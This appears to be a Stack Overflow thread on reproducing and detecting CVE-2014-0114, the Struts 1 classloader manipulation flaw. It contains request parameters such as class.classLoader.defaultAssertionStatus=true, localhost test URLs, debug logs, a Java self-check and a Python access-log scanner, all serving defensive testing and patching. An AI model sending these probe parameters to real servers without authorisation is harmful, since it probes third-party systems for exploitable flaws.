2

In Struts1, I heard that there is a classloader vulnerability issue which is caused by CVE-2014-0114. But I am unable to reproduce this with respect to my project. Can anyone help me reproduce this issue? I googled but did not find any procedure for reproducing it.

I am using struts-1.1, JBoss 4.2.3.GA, Apache 2.2.0, MySQL 5.0.37, JKMod, JDK 1.6.0_12, Ant 1.7.0 for my web project.

SkyWalker

5 Answers

11

Try to invoke a URL which is mapped to a struts action (backed by an action form). The framework will try to populate your form bean from query parameters. So if you have a query parameter like ?class.classLoader.defaultAssertionStatus=true, it translates to formBean.getClass().getClassLoader().setDefaultAssertionStatus(true).

If you have enabled debug logging, you would see the following messages:

    2014-05-05 12:57:50,238 DEBUG [org.apache.struts.action.RequestProcessor]  Populating bean properties from this request
    2014-05-05 12:57:50,238 DEBUG [org.apache.commons.beanutils.BeanUtils] BeanUtils.populate(com.xxx.struts.demo.web.form.SimpleForm@71909bc, {class.classLoader.defaultAssertionStatus=[Ljava.lang.String;@a6b23fd4})
    2014-05-05 12:57:50,238 DEBUG [org.apache.commons.beanutils.BeanUtils]   setProperty(com.xxx.struts.demo.web.form.SimpleForm@71909bc, class.classLoader.defaultAssertionStatus, [true])
    2014-05-05 12:57:50,246 DEBUG [org.apache.commons.beanutils.BeanUtils]     Target bean = com.ibm.ws.classloading.internal.AppClassLoader@3ac10955
    2014-05-05 12:57:50,246 DEBUG [org.apache.commons.beanutils.BeanUtils]     Target name = defaultAssertionStatus
    2014-05-05 12:57:50,250 DEBUG [org.apache.commons.beanutils.ConvertUtils] Convert string 'true' to class 'boolean'
    2014-05-05 12:57:50,250 DEBUG [org.apache.commons.beanutils.ConvertUtils]   Using converter org.apache.commons.beanutils.converters.BooleanConverter@de2943ef
    2014-05-05 12:57:50,250 DEBUG [org.apache.commons.beanutils.PropertyUtils] setSimpleProperty: Invoking method public void java.lang.ClassLoader.setDefaultAssertionStatus(boolean) with value true (class java.lang.Boolean)

SkyWalker
Kishore Kirdat
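
A defender's counterpart to the reproduction above, as an added example that is not part of the original answer: a small Python scanner that flags access-log requests whose parameter names walk through `class`, the traversal visible in the debug log. The log format, the sample lines and the function names are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# BeanUtils paths nest with '.', index with '[..]' and map with '(..)';
# splitting on all of them is deliberately conservative.
_SEPARATORS = re.compile(r"[.\[\]()'\"]+")
_REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/May/2014:12:57:50 +0000] "GET /MyFormGroupEditSection.do'
    '?class.classLoader.defaultAssertionStatus=true HTTP/1.1" 200 512',
    '198.51.100.7 - - [05/May/2014:12:58:02 +0000] "GET /MyFormGroupEditSection.do'
    '?%63lass.classLoader=true&groupId=862 HTTP/1.1" 200 512',
    '192.0.2.44 - - [05/May/2014:12:58:09 +0000] "GET /MyFormGroupEditSection.do'
    '?className=Marathon&groupId=862 HTTP/1.1" 200 512',
    'truncated line without a request field',
]


def class_traversal_params(url):
    """Return parameter names in `url` whose property path has a `class` segment."""
    hits = []
    # parse_qsl percent-decodes names, so %63lass.classLoader is caught too.
    for name, _value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        segments = [s for s in _SEPARATORS.split(name) if s]
        # Whole-segment match: `className` or `classification` is not flagged.
        # Ignoring case is a conservative assumption of this example.
        if any(s.lower() == "class" for s in segments):
            hits.append(name)
    return hits


def scan_access_log(lines):
    """Yield (client, path, flagged parameter names) for each matching request."""
    for line in lines:
        match = _REQUEST.match(line)
        if not match:
            continue  # skip lines that carry no parsable request
        hits = class_traversal_params(match.group(2))
        if hits:
            yield match.group(1), urlsplit(match.group(2)).path, hits


if __name__ == "__main__":
    for client, path, names in scan_access_log(SAMPLE_LOG):
        print(f"{client} {path} -> {', '.join(names)}")
```

Parameters sent in a POST body do not appear in an access log, so this covers query strings only.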
2

I have tried more than 2 ways for reproduction purposes. It works fine.

  1. http://127.0.0.1:8080/MyFormGroupEditSection.do?com.macao.DelphyHacker.Marathonclass.marathonId=34&groupId=862
  2. http://127.0.0.1:8080/MyFormGroupEditSection.do?class.classLoader=true&groupId=862

To solve this problem, I want to add some comments. You can follow these 2 links. Hopefully, they will help you to eradicate this problem.

http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro

http://mail-archives.apache.org/mod_mbox/struts-announcements/201405.mbox/%3C53629980.8060805%40apache.org%3E

SkyWalker
  • 1
    Another fix is at https://github.com/apache/struts1/pull/1 (see http://openwall.com/lists/oss-security/2014/06/15/10 for reference). – Pino Oct 02 '14 at 15:34
0

Further to the solutions above, I wanted to point out that adding a breakpoint in the ClassLoader at the line defaultAssertionStatus = enabled; within setDefaultAssertionStatus and a watcher at the line private boolean defaultAssertionStatus = false; is a great way of verifying whether the above URL modification, ?class.classLoader.defaultAssertionStatus=true, has worked. Your defaultAssertionStatus should now be true.

Hope this helps!

Sjon
Rebecca Douglas
  • This does not provide an answer to the question. To critique or request clarification from an author, leave a comment below their post - you can always comment on your own posts, and once you have sufficient [reputation](http://stackoverflow.com/help/whats-reputation) you will be able to [comment on any post](http://stackoverflow.com/help/privileges/comment). - [From Review](/review/low-quality-posts/10555562) – Toby Speight Dec 14 '15 at 14:12
  • I do not have enough rep and wanted to share this as I couldn't find an easy solution to testing if the URL works. The breakpoints I've specified above do the job. – Rebecca Douglas Dec 14 '15 at 14:44
0

Something like this works to test (in code at least)

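      // Requires: import org.apache.commons.beanutils.PropertyUtils;
      // Logger is assumed to be the application's own logging helper.
      try {
        // If this lookup succeeds, `class` is still reachable through getClass().
        PropertyUtils.getNestedProperty(this, "class");
        Logger.error(this, "SECURITY ISSUE- `class` attribute NOT DISABLED for BeanUtil introspection, See: CVE-2014-0114 ");
      } catch (java.lang.NoSuchMethodException nse) {
        // `class` is not exposed as a bean property, so the lookup fails.
        Logger.info(this, "`class` is disabled as a property for introspection in struts for security");
      } catch (Exception e) {
        Logger.warn(this, e.getMessage(), e);
      }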
wezell